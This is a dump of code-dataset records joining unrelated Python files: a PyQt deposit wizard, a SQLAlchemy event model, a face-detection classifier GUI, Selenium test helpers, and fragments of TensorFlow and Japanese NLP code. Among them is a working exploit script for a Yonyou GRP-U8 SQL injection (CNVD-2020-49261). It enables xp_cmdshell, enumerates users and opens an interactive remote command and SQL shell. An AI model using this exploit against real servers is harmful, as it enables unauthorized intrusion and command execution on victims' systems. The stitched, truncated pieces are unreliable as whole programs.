GPU_RESET.reset_keras()\n","sub_path":"Tensorflow Model Training.py","file_name":"Tensorflow Model Training.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"605156575","text":"# -*- coding: utf-8 -*- \n__Author__=\"p4ssw0rd\"\nimport requests\nimport sys\nimport urllib3\nimport re\nfrom html.parser import HTMLParser\n\nurllib3.disable_warnings()\nsession = requests.session()\nurl=\"http://127.0.0.1/\"\nheaders = {\"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 6.0;)\", \"Connection\": \"Keep-Alive\", \"Cache-Control\": \"no-cache\"}\npayloadCheck_xp_cmdshell=\"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';\"\npayloadOpen_xp_cmdshell=\"exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;\"\npayloadCheck_privilage=\"select user;\"\npayloadGetNetUser=\"exec master..xp_cmdshell 'net user';\"\npayloadStatus_xp_cmdshell=r\"select * from master..sysconfigures where comment like '%show advanced options%' or comment like '%xp_cmdshell%';\"\nglobal CommandExecution\n\n# 数据处理\ndef dataHandler(payload):\n data = {\"cVer\": \"9.8.0\", \"dp\": \"XMLAS_DataRequestProviderNameDataSetProviderDataData%s\"% payload} \n return HTMLParser().unescape(session.post(url, headers=headers, data=data,verify=False,).content.decode(\"utf8\",\"ignore\"))\n\n\n# 判断当前用户权限\ndef Check_privilage():\n content = dataHandler(payloadCheck_privilage)\n privilages = re.findall('',content)\n if len(privilages)==0:\n userDefinePayload()\n elif privilages[0]==\"dbo\":\n print(\"[+]恭喜,当前权限为dbo\")\n else:\n print(\"[+]当前权限为%s\" % privilages[0])\n# 判断xp_cmdshell是否禁用\ndef Check_xp_cmdshell():\n if '' in dataHandler(payloadCheck_xp_cmdshell):\n print(\"[+]xp_cmdshell已安装.\")\n else:\n print(\"[-]xp_cmdshell未安装.\")\n userDefinePayload()\n# 判断xp_cmdshell是否开启\ndef Status_xp_cmdshell():\n content = dataHandler(payloadStatus_xp_cmdshell)\n status = re.findall(\"(.*?)\",content)\n if len(results)==0:\n print(\"[-]执行命令失败,请手工验证\")\n userDefinePayload()\n else:\n result = re.findall('',results[0])\n for i in result:\n print(i) \n# 出现错误时自定义payload\ndef userDefinePayload():\n print(\"[*]请输入sql语句,输入exit()退出\")\n sql = input(\">\")\n while sql!=\"exit()\":\n print(dataHandler(sql)) \n sql = input(\">\")\n exit(0)\ndef urlHandle(url):\n while url[-1]==\"/\":\n url = url[:-1]\n return url+\"/Proxy\"\nif __name__ == \"__main__\":\n if len(sys.argv)<2:\n print(\"[*]usage : python3 %s http://127.0.0.1/\" 
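# ---- Editor's aside on the TensorFlow training script above (hedged) ----
# The four nested hyperparameter loops enumerate a full grid; itertools.product
# expresses the same enumeration in one loop header, with the same lists.
import itertools

for dense_layer, layer_size, conv_layer, optimchoice in itertools.product(
        [0, 1, 2], [16, 32, 64, 128], [1, 2, 3], ['adam', 'SGD', 'RMSprop']):
    pass  # build, compile, and fit one model per combination, as in the loop body above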
% __file__)\n else:\n url = urlHandle(sys.argv[1])\n Check_privilage()\n Check_xp_cmdshell()\n Status_xp_cmdshell()\n Get_net_user()\n print(\"[*]正在尝试使用xp_cmdshell命令执行\") \n CommandExecution\n if CommandExecution == True:\n print(\"[*]请输入命令,输入exit()退出\")\n command = input(\">\")\n while command!=\"exit()\":\n Get_CommandResult(command)\n command = input(\">\")\n exit(0)\n else:\n print(\"[-]失败\")\n userDefinePayload()\n","sub_path":"用友GRP-8注入/CNVD-2020-49261_exp.py","file_name":"CNVD-2020-49261_exp.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612771121","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMdiSubWindow\n\nfrom sqlalchemy import exc\n\nfrom Celda.src.Library.DataORM import *\n\nfrom Celda.src.GUI.ui.Util import show_dialog\nfrom Celda.src.GUI.ui.WizardEntrySlotCase import WizardEntrySlotCase\n\n\nclass ControlWizardEntrySlotCase:\n\n def __init__(self, enginedb, mdi_area):\n self.enginedb = enginedb\n self.mdi_area = mdi_area\n self.container_widget = None\n self.currentDeposit = None\n self.slot_case = None\n self.sub = None\n\n def init(self):\n self.container_widget = None\n self.currentDeposit = None\n self.slot_case = None\n self.sub = None\n\n def show_wizard_entry_slot_case(self):\n if self.sub is None:\n self.sub = QMdiSubWindow()\n self.container_widget = WizardEntrySlotCase()\n self.container_widget.pushButtonAcceptBarCode.clicked.connect(self.on_accept_barcode)\n self.container_widget.pushButtonDepositScan.clicked.connect(self.on_deposit_scan)\n self.container_widget.pushButtonDepositBack.clicked.connect(self.on_deposit_back)\n self.container_widget.pushButtonDepositCancel.clicked.connect(self.on_deposit_cancel)\n self.container_widget.pushButtonDepositOK.clicked.connect(self.on_deposit_ok)\n self.container_widget.pushButtonSlotsBack.clicked.connect(self.on_slots_back)\n self.container_widget.pushButtonSlotsCancel.clicked.connect(self.on_slots_cancel)\n self.container_widget.pushButtonSlotsNewDeposit.clicked.connect(self.on_slots_new_deposit)\n self.container_widget.pushButtonSlotsNewSlotCase.clicked.connect(\n lambda: (self.on_slots_new_slot_case(), self.sub.close()))\n self.sub.setWidget(self.container_widget)\n self.sub.setWindowTitle(\"Wizard Ingreso Maletas\")\n self.mdi_area.addSubWindow(self.sub)\n self.sub.showMaximized()\n self.sub.closeEvent = self.close_event\n\n def close_event(self, event):\n self.sub.close()\n self.init()\n\n def save_data(self):\n if self.currentDeposit is not None:\n session = self.enginedb.get_session()\n try:\n session.add(self.currentDeposit)\n session.flush()\n for slot in self.container_widget.get_slots_enables():\n if not slot.is_empty:\n slot.deposit = self.currentDeposit\n session.add(slot)\n session.commit()\n return True\n except exc.SQLAlchemyError as e:\n session.rollback()\n show_dialog(message=\"Se produjo un error al guardar los datos de la maleta en la base de datos\",\n title=\"Error\", detailed=str(e),\n icon=QtWidgets.QMessageBox.Critical)\n return False\n finally:\n session.close()\n\n def go_slot_case_widget(self, clear=True):\n if clear:\n self.container_widget.clear_deposit_widget()\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_slots_new_deposit(self):\n pass\n\n def on_slots_new_slot_case(self):\n if not self.container_widget.has_slots_selected():\n ret = show_dialog(message=\n \"Recuerde seleccionar un slot para el deposito actual\",\n 
title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Ok,\n icon=QtWidgets.QMessageBox.Information)\n else:\n if self.container_widget.has_slots_available():\n ret = show_dialog(message=\n \"Todavía existen slot disponibles ¿Está seguro de guardar esta maleta?\",\n title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel,\n icon=QtWidgets.QMessageBox.Question)\n if ret == QtWidgets.QMessageBox.Yes:\n if self.save_data(): # Save slot case\n self.go_slot_case_widget()\n else:\n ret = show_dialog(message=\n \"¿Desea mantener la información del deposito actual para la próxima maleta?\",\n title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel,\n icon=QtWidgets.QMessageBox.Question)\n if ret == QtWidgets.QMessageBox.Yes:\n if self.save_data():\n self.go_slot_case_widget()\n elif ret == QtWidgets.QMessageBox.No:\n if self.save_data():\n self.currentDeposit = None\n self.go_slot_case_widget()\n\n def on_slots_cancel(self):\n self.container_widget.clear_slots_widget()\n self.on_deposit_cancel()\n\n def on_slots_back(self):\n self.currentDeposit = None\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_DEPOSIT)\n\n def on_deposit_ok(self):\n account_id = self.container_widget.lineEditDepositAccountID.text()\n amount = self.container_widget.lineEditDepositAmount.text()\n name = self.container_widget.lineEditDepositName.text()\n try:\n account = Account.get(enginedb=self.enginedb, account_id=account_id)\n if account is None:\n show_dialog(message=\"No existe la cuenta {}\".format(account_id), title=\"Aviso\",\n icon=QtWidgets.QMessageBox.Information)\n else:\n self.currentDeposit = Deposit(amount=amount, account=account, name=name)\n self.container_widget.update_slot(slot_case=self.slot_case, deposit=self.currentDeposit)\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOTS)\n except Exception as e:\n show_dialog(message=\"Error durante el proceso de ingreso de deposito\", title=\"Error\", detailed=str(e),\n icon=QtWidgets.QMessageBox.Critical)\n\n def on_deposit_back(self):\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_deposit_cancel(self):\n self.currentDeposit = None\n self.container_widget.clear_deposit_widget()\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_deposit_scan(self):\n pass\n\n def on_accept_barcode(self):\n barcode = self.container_widget.lineEditBarcode.text()\n if barcode:\n self.slot_case = SlotCase.get_slot_case(enginedb=self.enginedb, code=barcode)\n if self.slot_case is None:\n show_dialog(message=\"No existe la maleta con código: {}\".format(barcode), title=\"Error\",\n icon=QtWidgets.QMessageBox.Warning)\n elif self.currentDeposit is not None:\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOTS)\n else:\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_DEPOSIT)\n","sub_path":"Celda/src/GUI/ui/ControlWizardEntrySlotCase.py","file_name":"ControlWizardEntrySlotCase.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470337043","text":"from database.database import *\n\n\nclass Event(Base):\n __tablename__ = 'event'\n __table_args__ = {'extend_existing': True}\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(256))\n place = sa.Column(sa.String(256))\n date = 
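# ---- Editor's aside on save_data above (hedged; engine URL and objects are placeholders) ----
# The hand-rolled flush/commit/rollback/close sequence is what SQLAlchemy's
# session.begin() context manager (1.4+) provides in one line.
from sqlalchemy import create_engine
from sqlalchemy.orm import Session

_engine = create_engine("sqlite:///:memory:")
with Session(_engine) as _session, _session.begin():
    pass  # _session.add(deposit); commits on success, rolls back on any exception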
sa.Column(sa.String(256))\n time = sa.Column(sa.String(256))\n over = sa.Column(sa.Boolean)\n\n @staticmethod\n def add_event(name):\n event = Event(name=name, over=False)\n session.add(event)\n session.commit()\n return event\n\n @staticmethod\n def add_events():\n if len(Event.get_all_events()) > 0:\n return True\n else:\n session.add(Event(name='День донора', place='ауд. 366', date='04.03.20', time='10:30', over=False))\n session.add(Event(name=\"Ярмарок кар'єри\", place='ауд. 512', date='05.04.20', time='10:00-15:00', over=False))\n session.add(Event(name='Турнір з міні-футболу', place='спорткомплекс', date='22.06.20', time='11:00', over=False))\n\n session.commit()\n\n print(\"events added\")\n\n @staticmethod\n def update_event(event_id, name='', place='', date='', time=''):\n event = session.query(Event).get(event_id)\n\n if name != '':\n event.name = name\n elif place != '':\n event.place = place\n elif date != '':\n event.date = date\n elif time != '':\n event.time = time\n\n session.commit()\n\n @staticmethod\n def get_event_id_by_name(name):\n event = session.query(Event).filter(Event.name == name).one()\n return event.id\n\n @staticmethod\n def get_event(event_id):\n return session.query(Event).get(event_id)\n\n @staticmethod\n def get_all_events():\n return [event for event in session.query(Event).all() if event.over is False]\n\n @staticmethod\n def delete_event(event_id):\n event = Event.get_event(event_id)\n event.over = True\n # event_visitors = session.query(EventVisitor).filter(EventVisitor.event_id == event_id)\n #\n # if len(event_visitors.all()) > 0:\n # event_visitors.delete()\n #\n # session.delete(session.query(Event).get(event_id))\n session.commit()\n\n\nBase.metadata.create_all(conn)\n","sub_path":"database/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"427145457","text":"import sys\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport os\r\n\r\nimport cv2\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\r\nfrom hipsteOrNot_final import Ui_MainWindow\r\n\r\nclass hipsterOrNot(QMainWindow,Ui_MainWindow):\r\n def __init__(self):\r\n super(hipsterOrNot,self).__init__()\r\n self.setupUi(self)\r\n self.image=None\r\n\r\n self.dirName = None\r\n self.imgFileName = None\r\n\r\n self.last_firmware_directory = None\r\n self.btn_load.clicked.connect(self.loadClicked)\r\n\r\n @pyqtSlot()\r\n def loadClicked(self):\r\n\r\n ret=self.loadImageFile\r\n\r\n print(\"file name\",ret)\r\n if 'p#' in ret:\r\n self.lbl_result.setText(\"Please Load File Properly\")\r\n print('Invalid Image')\r\n else:\r\n self.loadImage(ret)\r\n\r\n @property\r\n def loadImageFile(self):\r\n filter = \"Image files (*.jpg *.png *.jpeg)\"\r\n firmware_dir = None\r\n if self.last_firmware_directory:\r\n firmware_dir = self.last_firmware_directory\r\n\r\n p = QFileDialog.getOpenFileName(parent=self, caption=\"Select Image File\",\r\n directory=firmware_dir, filter=filter)\r\n path = p[0]\r\n if path:\r\n self.last_firmware_directory = \"/\".join(path.split(\"/\")[0:-1])\r\n\r\n if p[0]:\r\n self.imgFileName = p[0]\r\n print(p[0])\r\n return self.imgFileName\r\n else:\r\n print('Invalid Image File')\r\n return \"p#\"\r\n\r\n\r\n def loadImage(self,fname):\r\n self.image=cv2.imread(fname,cv2.IMREAD_COLOR)\r\n self.crop_predict()\r\n\r\n\r\n def addFacePadding(self,cvRect, padding):\r\n cvRect[0] = cvRect[0] - 
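# ---- Editor's note on get_event_id_by_name in the Event model above (hedged, generic sketch) ----
# Query.one() raises NoResultFound when nothing matches; one_or_none() is the
# forgiving variant. `session` and `model` are parameters here, not globals.
def _get_id_by_name_safe(session, model, name):
    obj = session.query(model).filter(model.name == name).one_or_none()
    return obj.id if obj is not None else None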
padding # left x\r\n cvRect[1] = cvRect[1] - padding # left y\r\n\r\n cvRect[2] = cvRect[2] + padding # bottom x\r\n cvRect[3] = cvRect[3] + padding # bottom y\r\n\r\n return cvRect\r\n\r\n def predict_image(self, img, debug=True):\r\n\r\n try:\r\n\r\n # Path of training images\r\n train_path = r'./data/train'\r\n if not os.path.exists(train_path):\r\n print(\"No such directory\")\r\n raise Exception\r\n\r\n image_size = 128\r\n num_channels = 3\r\n images = []\r\n\r\n # Resizing the image to our desired size and preprocessing will be done exactly as done during training\r\n image = cv2.resize(img, (image_size, image_size), 0, 0, cv2.INTER_LINEAR)\r\n images.append(image)\r\n images = np.array(images, dtype=np.uint8)\r\n images = images.astype('float32')\r\n images = np.multiply(images, 1.0 / 255.0)\r\n\r\n # The input to the network is of shape [None image_size image_size num_channels]. Hence we reshape.\r\n x_batch = images.reshape(1, image_size, image_size, num_channels)\r\n\r\n # Let us restore the saved model\r\n sess = tf.Session()\r\n # Step-1: Recreate the network graph. At this step only graph is created.\r\n saver = tf.train.import_meta_graph('models/trained_model.meta')\r\n # Step-2: Now let's load the weights saved using the restore method.\r\n saver.restore(sess, tf.train.latest_checkpoint('./models/'))\r\n\r\n # Accessing the default graph which we have restored\r\n graph = tf.get_default_graph()\r\n\r\n # Now, let's get hold of the op that we can be processed to get the output.\r\n y_pred = graph.get_tensor_by_name(\"y_pred:0\")\r\n\r\n ## Let's feed the images to the input placeholders\r\n x = graph.get_tensor_by_name(\"x:0\")\r\n y_true = graph.get_tensor_by_name(\"y_true:0\")\r\n y_test_images = np.zeros((1, len(os.listdir(train_path))))\r\n\r\n # Creating the feed_dict that is required to be fed to calculate y_pred\r\n feed_dict_testing = {x: x_batch, y_true: y_test_images}\r\n result = sess.run(y_pred, feed_dict=feed_dict_testing)\r\n # Result is of this format [[probabiliy_of_classA probability_of_classB ....]]\r\n if debug:\r\n print(result)\r\n\r\n # Convert np.array to list\r\n a = result[0].tolist()\r\n r = 0\r\n\r\n # Finding the maximum of all outputs\r\n max1 = max(a)\r\n index1 = a.index(max1)\r\n predicted_class = None\r\n\r\n # Walk through directory to find the label of the predicted output\r\n count = 0\r\n for root, dirs, files in os.walk(train_path):\r\n for name in dirs:\r\n if count == index1:\r\n predicted_class = name\r\n count += 1\r\n\r\n for i in a:\r\n if i != max1:\r\n if max1 - i < i:\r\n r = 1\r\n if r == 0:\r\n if debug:\r\n print(\"Predicted:\", predicted_class)\r\n else:\r\n if debug:\r\n print(\"Could not classify with definite confidence\")\r\n print(\"Maybe:\", predicted_class)\r\n\r\n return predicted_class\r\n\r\n except Exception as e:\r\n print(\"Exception:\", e)\r\n\r\n def image_resize(self,image, width=None, height=None, inter=cv2.INTER_AREA):\r\n # initialize the dimensions of the image to be resized and\r\n # grab the image size\r\n dim = None\r\n (h, w) = image.shape[:2]\r\n\r\n # if both the width and height are None, then return the\r\n # original image\r\n if width is None and height is None:\r\n return image\r\n\r\n # check to see if the width is None\r\n if width is None:\r\n # calculate the ratio of the height and construct the\r\n # dimensions\r\n r = height / float(h)\r\n dim = (int(w * r), height)\r\n\r\n # otherwise, the height is None\r\n else:\r\n # calculate the ratio of the width and construct the\r\n # 
dimensions\r\n r = width / float(w)\r\n dim = (width, int(h * r))\r\n\r\n # resize the image\r\n resized = cv2.resize(image, dim, interpolation=inter)\r\n\r\n # return the resized image\r\n return resized\r\n\r\n\r\n def crop_predict(self, padding=1):\r\n count=0\r\n\r\n net = cv2.dnn.readNetFromCaffe(\"./models/deploy.prototxt\",\r\n \"./models/res10_300x300_ssd_iter_140000_fp16.caffemodel\")\r\n\r\n mainImage = self.image.copy()\r\n frameWidth = mainImage.shape[1]\r\n padPercent = int(frameWidth * padding / 100)\r\n\r\n (h, w) = mainImage.shape[:2]\r\n # Call cv2.dnn.blobFromImages():\r\n blob_images = cv2.dnn.blobFromImage(cv2.resize(mainImage, (300, 300)), 1.0, (250, 250), [104., 117., 123.],False,False)\r\n\r\n # Set the blob as input and obtain the detections:\r\n net.setInput(blob_images)\r\n detections = net.forward()\r\n\r\n # print(\"go\",detections.shape[2])\r\n for i in range(0, detections.shape[2]):\r\n confidence = detections[0, 0, i, 2]\r\n\r\n # Filter out weak predictions:\r\n if confidence > 0.7:\r\n count+=1\r\n # Get the size of the current image:\r\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\r\n (startX, startY, endX, endY) = box.astype(\"int\")\r\n\r\n\r\n cvRect = [int(startX), int(startY),\r\n int(endX), int(endY)]\r\n\r\n # cvRect = self.addFacePadding(cvRect, padPercent)\r\n\r\n if cvRect[1] < 0:\r\n cvRect[1] = 0\r\n elif cvRect[2] < 0:\r\n cvRect[2] = 0\r\n elif cvRect[3] < 0:\r\n cvRect[3] = 0\r\n elif cvRect[0] < 0:\r\n cvRect[0] = 0\r\n\r\n y = endY + 15 if endY - 10 > 10 else endY + 15\r\n\r\n print('pos=', h, w)\r\n print('rec', cvRect)\r\n\r\n if cvRect[2] > w or cvRect[3] > h:\r\n print('wrong')\r\n else:\r\n roi = mainImage[cvRect[1]:cvRect[3], cvRect[0]:cvRect[2]]\r\n\r\n result = self.predict_image(roi)\r\n text = \"{:.2f}%\".format(confidence * 100)\r\n text2 = \"{}\".format(result)\r\n\r\n\r\n cv2.rectangle(mainImage, (cvRect[0], cvRect[1]), (cvRect[2], cvRect[3]),\r\n (0, 255, 255), 2)\r\n\r\n cv2.putText(mainImage, text, (startX, y),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\r\n\r\n cv2.putText(mainImage, text2, (startX, y - 20),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n\r\n if count>0:\r\n text1 = \"Predicted: {}\".format(result)\r\n self.lbl_result.setText(text1)\r\n # self.displayImage(mainImage)\r\n image = self.image_resize(mainImage, height=600)\r\n cv2.namedWindow('Hipster or Not Detection')\r\n cv2.imshow('Hipster or Not Detection',image)\r\n\r\n else:\r\n self.lbl_result.setText(\"Please Use a Full Front Face\")\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n app=QApplication(sys.argv)\r\n window=hipsterOrNot()\r\n window.setWindowTitle('Hipster or Not Detection')\r\n window.show()\r\n sys.exit(app.exec_())","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":9498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417699857","text":"\nfrom model.contact import Contact\nimport re\n\nclass ContactHelper:\n\n def __init__(self,app):\n self.app = app\n\n def open_contact_page(self):\n wd = self.app.wd\n if not wd.current_url.endswith(\"/index.php\"):\n wd.find_element_by_link_text(\"home\").click()\n\n def return_home_page_contact(self):\n wd = self.app.wd\n wd.find_element_by_link_text(\"home\").click()\n\n def create(self, contact):\n wd = self.app.wd\n self.add_new_contact()\n # fill group form\n self.addinfo(contact)\n # submit contact creation\n wd.find_element_by_name(\"submit\").click()\n 
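# ---- Editor's aside on crop_predict in the face-detection GUI above (hedged recap, GUI removed) ----
# Resize to 300x300, mean-subtract into a blob, forward the net, keep detections
# above a confidence threshold, and scale the boxes back to image coordinates.
import cv2
import numpy as np

def _detect_faces(image, net, conf_threshold=0.7):
    h, w = image.shape[:2]
    blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0, (300, 300), (104., 117., 123.))
    net.setInput(blob)
    detections = net.forward()
    boxes = []
    for i in range(detections.shape[2]):
        if detections[0, 0, i, 2] > conf_threshold:
            boxes.append((detections[0, 0, i, 3:7] * np.array([w, h, w, h])).astype(int))
    return boxes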
self.return_home_page_contact()\n self.contact_cache = None\n\n def add_new_contact(self):\n wd = self.app.wd\n # add new contact\n wd.find_element_by_link_text(\"add new\").click()\n self.contact_cache = None\n\n def delete_contact_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n # select first contact\n self.select_contact_by_index(index)\n # submit deletion\n wd.find_element_by_xpath(\"//input[@value='Delete']\").click()\n # ok dialog window\n wd.switch_to_alert().accept()\n # wait info\n wd.find_element_by_css_selector(\"div.msgbox\")\n self.return_home_page_contact()\n self.contact_cache = None\n\n def delete_contact_by_id(self, id):\n wd = self.app.wd\n self.open_contact_page()\n # select first contact\n self.select_contact_by_id(id)\n # submit deletion\n wd.find_element_by_xpath(\"//input[@value='Delete']\").click()\n # ok dialog window\n wd.switch_to_alert().accept()\n # wait info\n wd.find_element_by_css_selector(\"div.msgbox\")\n self.return_home_page_contact()\n self.contact_cache = None\n\n def delete_first_contact(self):\n self.delete_contact_by_index(0)\n\n def select_contact_by_index(self, index):\n wd = self.app.wd\n wd.find_elements_by_name(\"selected[]\")[index].click()\n\n def select_contact_by_id(self, id):\n wd = self.app.wd\n wd.find_element_by_css_selector(\"input[value='%s']\" % id).click()\n\n def modify_contact_by_index(self, index, contact):\n wd = self.app.wd\n self.open_contact_page()\n #self.select_contact_by_index(index)\n # Edit\n wd.find_element_by_xpath(\"(//img[@alt='Edit'])[\" + str(index) +\"]\").click()\n # modify\n self.addinfo(contact)\n # click update\n wd.find_element_by_name(\"update\").click()\n self.return_home_page_contact()\n self.contact_cache = None\n\n def modify_first_contact(self):\n self.modify_contact_by_index(0)\n\n def modify(self, contact):\n wd = self.app.wd\n self.open_contact_page()\n self.select_first_contact()\n # Edit\n wd.find_element_by_css_selector('img[alt=\"Edit\"]').click()\n # modify\n self.addinfo(contact)\n # click update\n wd.find_element_by_name(\"update\").click()\n self.return_home_page_contact()\n self.contact_cache = None\n\n def select_first_contact(self):\n wd = self.app.wd\n wd.find_element_by_name(\"selected[]\").click()\n\n\n def addinfo(self, contact):\n wd = self.app.wd\n self.change_field_value(\"firstname\", contact.firstname)\n self.change_field_value(\"middlename\", contact.middlename)\n self.change_field_value(\"lastname\", contact.lastname)\n self.change_field_value(\"nickname\", contact.nickname)\n self.contact_cache = None\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n self.contact_cache = None\n\n def count(self):\n wd = self.app.wd\n self.open_contact_page()\n return len(wd.find_elements_by_name(\"selected[]\"))\n\n contact_cache = None\n\n def get_contact_list(self):\n if self.contact_cache is None:\n wd = self.app.wd\n self.open_contact_page()\n self.contact_cache = []\n #contact_table = wd.find_element_by_css_selector(\"tbody\")\n for row in wd.find_elements_by_name(\"entry\"):\n cells = row.find_elements_by_tag_name(\"td\")\n firstname = cells[2].text\n lastname = cells[1].text\n address = cells[3].text\n id = cells[0].find_element_by_name(\"selected[]\").get_attribute(\"value\")\n all_phones = cells[5].text\n all_emails_from_home_page = cells[4].text\n 
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id,\n all_phones_from_home_page=all_phones, address=address,\n all_emails_from_home_page=all_emails_from_home_page))\n return list(self.contact_cache)\n\n\n def open_contact_to_edit_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n row = wd.find_elements_by_name(\"entry\")[index]\n cell = row.find_elements_by_tag_name(\"td\")[7]\n cell.find_element_by_tag_name(\"a\").click()\n\n def open_contact_view_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n row = wd.find_elements_by_name(\"entry\")[index]\n cell = row.find_elements_by_tag_name(\"td\")[6]\n cell.find_element_by_tag_name(\"a\").click()\n\n\n def get_contact_info_from_edit_page(self, index):\n wd = self.app.wd\n self.open_contact_to_edit_by_index(index)\n firstname = wd.find_element_by_name(\"firstname\").get_attribute(\"value\")\n lastname = wd.find_element_by_name(\"lastname\").get_attribute(\"value\")\n id = wd.find_element_by_name(\"id\").get_attribute(\"value\")\n homephone = wd.find_element_by_name(\"home\").get_attribute(\"value\")\n workphone = wd.find_element_by_name(\"work\").get_attribute(\"value\")\n mobilphone = wd.find_element_by_name(\"mobile\").get_attribute(\"value\")\n secondaryphone = wd.find_element_by_name(\"phone2\").get_attribute(\"value\")\n address = wd.find_element_by_name(\"address\").get_attribute(\"value\")\n email = wd.find_element_by_name(\"email\").get_attribute(\"value\")\n email2 = wd.find_element_by_name(\"email2\").get_attribute(\"value\")\n email3 = wd.find_element_by_name(\"email3\").get_attribute(\"value\")\n return Contact(firstname=firstname, lastname=lastname, id=id,\n homephone=homephone, mobilphone=mobilphone,\n workphone=workphone, secondaryphone=secondaryphone,\n address=address, email=email, email2=email2, email3=email3)\n\n def get_contact_from_view_page(self, index):\n wd = self.app.wd\n self.open_contact_view_by_index(index)\n text = wd.find_element_by_id(\"content\").text\n homephone = re.search(\"H: (.*)\", text).group(1)\n workphone = re.search(\"W: (.*)\", text).group(1)\n mobilphone = re.search(\"M: (.*)\", text).group(1)\n secondaryphone = re.search(\"P: (.*)\", text).group(1)\n return Contact(homephone=homephone, mobilphone=mobilphone,\n workphone=workphone, secondaryphone=secondaryphone)\n","sub_path":"fixture/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31697456","text":"import re\nfrom .models import Causal, Goal, Step, PrunedUser, Smart, Relation, Pattern, Crawler, ResultExpression, ClueExpression\nfrom cabocha.analyzer import CaboChaAnalyzer\nfrom cabocha.analyzer import EndOfLinkException\nfrom enum import Enum\nfrom datetime import datetime\nimport pandas as pd\n\n\nclass cross_bootstrap:\n clueList = []\n\n eclueList = []\n\n gclueList = []\n\n geclueList = []\n\n eqclueList = []\n\n eqeclueList = []\n\n rclueList = []\n\n grclueList = []\n\n eqrclueList = []\n\n reclueList = []\n\n greclueList = []\n\n eqreclueList = []\n\n skipList = []\n\n def __init__(self):\n self.utilSet()\n\n def utilSet(self):\n\n self.skipList = pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n\n self.clueList = pd.read_csv(\"Util/ja_clue_list.csv\").dropna(subset=['clue'])\n self.eclueList = pd.read_csv(\"Util/ja_eclue_list.csv\").dropna(subset=['clue'])\n self.gclueList = 
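# ---- Editor's aside on get_contact_from_view_page above (hedged; sample text is invented) ----
# The four re.search calls pull labeled phone numbers out of free text; a compact
# standalone equivalent:
import re

_text = "H: 111\nW: 222\nM: 333\nP: 444"
_phones = {k: re.search(k + r": (.*)", _text).group(1) for k in ("H", "W", "M", "P")}
assert _phones == {"H": "111", "W": "222", "M": "333", "P": "444"}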
pd.read_csv(\"Util/ja_goal_clue_list.csv\").dropna(subset=['clue'])\n self.geclueList = pd.read_csv(\"Util/ja_goal_eclue_list.csv\").dropna(subset=['clue'])\n self.eqclueList = pd.read_csv(\"Util/ja_equal_clue_list.csv\").dropna(subset=['clue'])\n self.eqeclueList = pd.read_csv(\"Util/ja_equal_eclue_list.csv\").dropna(subset=['clue'])\n\n self.rclueList = []\n self.grclueList = []\n self.eqrclueList = []\n\n # self.rclueList = pd.read_csv(\"Util/ja_result_list.csv\").dropna(subset=['clue'])['clue']\n # self.grclueList =pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n # self.eqrclueList = pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n\n def checkResult(self, resultChunk):\n pos = resultChunk[resultChunk.token_size - 1].pos\n pos1 = resultChunk[resultChunk.token_size - 1].pos1\n if pos == \"助詞\":\n return False\n else:\n return True\n\n def getEndResult(self, texts):\n analyzer = CaboChaAnalyzer()\n results = []\n for text in texts:\n tree = analyzer.parse(text)\n lastChunk = tree[tree.chunk_size - 1]\n if self.checkResult(lastChunk):\n results.append(lastChunk)\n return results\n\n def getResultFromCausal(self, causal):\n results = []\n if causal.pattern == Pattern.A or Pattern.B:\n results = 